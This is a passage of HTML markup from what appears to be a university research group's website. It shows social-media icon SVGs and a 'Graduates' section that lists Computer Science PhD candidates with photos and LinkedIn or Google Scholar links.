xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://cas.gsu.edu/profile/taylor-shelton/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://scholar.google.com/citations?user=WFA1Ry8AAAAJ&hl=en\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"182-c70\" id=\"grads\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-846 style-local-182-c70 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <div data-colibri-id=\"182-c96\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-860 style-local-182-c96 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-861-outer style-local-182-c97-outer\">\n <div data-colibri-id=\"182-c97\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-861 style-local-182-c97 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c98\" class=\"h-global-transition-all h-heading style-862 style-local-182-c98 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-862 style-local-182-c98\">\n <!---->\n <!---->\n <h2 class=\"\">Graduates</h2>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c71\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-847 style-local-182-c71 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c78-outer\">\n <div data-colibri-id=\"182-c78\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c78 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c79\" class=\"d-block style-854 style-local-182-c79 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Sundos_Al_Subhi-1.jpg\" class=\"wp-image-1592 style-854-image style-local-182-c79-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c79-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c80\" class=\"h-global-transition-all h-heading style-850 style-local-182-c80 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-850 style-local-182-c80\">\n <!---->\n <!---->\n <h4 class=\"\">Sundos Al Subhi</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c81\" class=\"h-text h-text-component style-851 style-local-182-c81 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>PhD Candidate\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c246\" class=\"h-text h-text-component style-902 style-local-182-c246 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c83\" class=\"style-855 style-local-182-c83 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/sundos-al-subhi-88bb97150\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c72-outer\">\n <div data-colibri-id=\"182-c72\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c72 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c73\" class=\"d-block style-849 style-local-182-c73 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/06/cropped-IMG_1240-scaled-1.jpg\" class=\"wp-image-1336 style-849-image style-local-182-c73-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-849-frameImage style-local-182-c73-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c74\" class=\"h-global-transition-all h-heading style-850 style-local-182-c74 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-850 style-local-182-c74\">\n <!---->\n <!---->\n <h4 class=\"\">Aaja Christie</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c75\" class=\"h-text h-text-component style-851 style-local-182-c75 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>PhD Candidate\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c245\" class=\"h-text h-text-component style-901 style-local-182-c245 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c77\" class=\"style-853 style-local-182-c77 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/aaja-christie-17573657/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c84-outer\">\n <div data-colibri-id=\"182-c84\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c84 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"182-c85\" class=\"d-block style-856 style-local-182-c85 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-Emma.jpg\" class=\"wp-image-966 style-856-image style-local-182-c85-image\">\n <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-856-frameImage style-local-182-c85-frameImage\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"182-c86\" class=\"h-global-transition-all h-heading style-850 style-local-182-c86 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-850 style-local-182-c86\">\n <!---->\n <!---->\n <h4 class=\"\">Emma McDaniel</h4>\n </div>\n </div>\n <div data-colibri-id=\"182-c87\" class=\"h-text h-text-component style-851 style-local-182-c87 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>PhD Candidate\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c88\" class=\"h-text h-text-component style-852 style-local-182-c88 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Computer Science\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"182-c89\" class=\"style-857 style-local-182-c89 position-relative h-element\">\n <!---->\n <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://www.linkedin.com/in/emmamcdaniel/\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n </svg>\n </div>\n </div>\n </a>\n </div>\n <div class=\"social-icon-container d-inline-flex\">\n <a href=\"https://scholar.google.com/citations?user=Cwt8OwkAAAAJ&hl=en\" h-use-smooth-scroll=\"true\">\n <div class=\"icon-container h-social-icon h-global-transition\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Socicon (http://www.socicon.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 